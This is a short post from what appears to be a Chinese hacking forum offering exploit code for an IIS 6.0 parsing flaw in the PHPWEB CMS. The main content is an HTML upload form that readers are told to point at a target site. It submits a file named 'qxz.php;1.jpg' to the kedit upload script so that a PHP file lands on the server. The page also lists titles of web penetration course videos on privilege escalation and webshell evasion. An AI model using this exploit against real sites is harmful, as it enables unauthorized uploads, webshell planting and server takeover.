HACK80

我们很年轻,但我们有信念、有梦想!

我们坚信只有今天付出了,才有机会看到明天的太阳!
现在!加入我们,给你一个气氛优秀的技术圈子

作者: youqian
查看: 51|回复: 0

more +随机图赏Gallery

2017年中旬WEB渗透系列课程-26Mysql下UDF提权2017年中旬WEB渗透系列课程-26Mysql下UDF提权
2017年中旬WEB渗透系列课程-25基于php参数开关的提权2017年中旬WEB渗透系列课程-25基于php参数开关的提权
2017年中旬WEB渗透系列课程-24提权分类2017年中旬WEB渗透系列课程-24提权分类
2017年中旬WEB渗透系列课程-23提权认识2017年中旬WEB渗透系列课程-23提权认识
2017年中旬WEB渗透系列课程-22CMS相关2017年中旬WEB渗透系列课程-22CMS相关
2017年中旬WEB渗透系列课程-21webshell免杀相关问题2017年中旬WEB渗透系列课程-21webshell免杀相关问题
2017年中旬WEB渗透系列课程-20关于指令执行2017年中旬WEB渗透系列课程-20关于指令执行
2017年中旬WEB渗透系列课程-19文件包含与目录遍历2017年中旬WEB渗透系列课程-19文件包含与目录遍历
2017年中旬WEB渗透系列课程-18上传绕过方法演示2017年中旬WEB渗透系列课程-18上传绕过方法演示
2017年中旬WEB渗透系列课程-17了解上传检测方式2017年中旬WEB渗透系列课程-17了解上传检测方式

PHPWEB IIS6.0解析漏洞利用源码

[复制链接]
youqian 发表于 7 天前 | 显示全部楼层 |阅读模式
查看: 51|回复: 0

马上注册,加入HACK80!与我们一起交流。

正式会员需要 登录 才可以下载或查看,没有帐号?立即注册

x
PHPWEB IIS6.0解析漏洞,并附上利用源码
请复制以下代码,保存为HTML,并替换代码里的www.gxsec.com网址为目标站地址

  1. <form name="uploadForm" method="post" enctype="multipart/form-data"action="http://www.gxsec.com/kedit/upload_cgi/upload.php">   
  2. <input type="text" name="fileName" value="qxz.php;1.jpg" />   
  3. <input type="hidden" name="attachPath" value="news/pics/" />   
  4. <input type="file" name="fileData" size="14" /></td>   
  5. <input type="submit" name="button" value="确定" />   
  6. </form>
复制代码


正式会员需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|手机版|小黑屋|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2017-10-19 15:08 , Processed in 0.049395 second(s), 27 queries .

Powered by Discuz! X3.2 © 2001-2013 Comsenz Inc.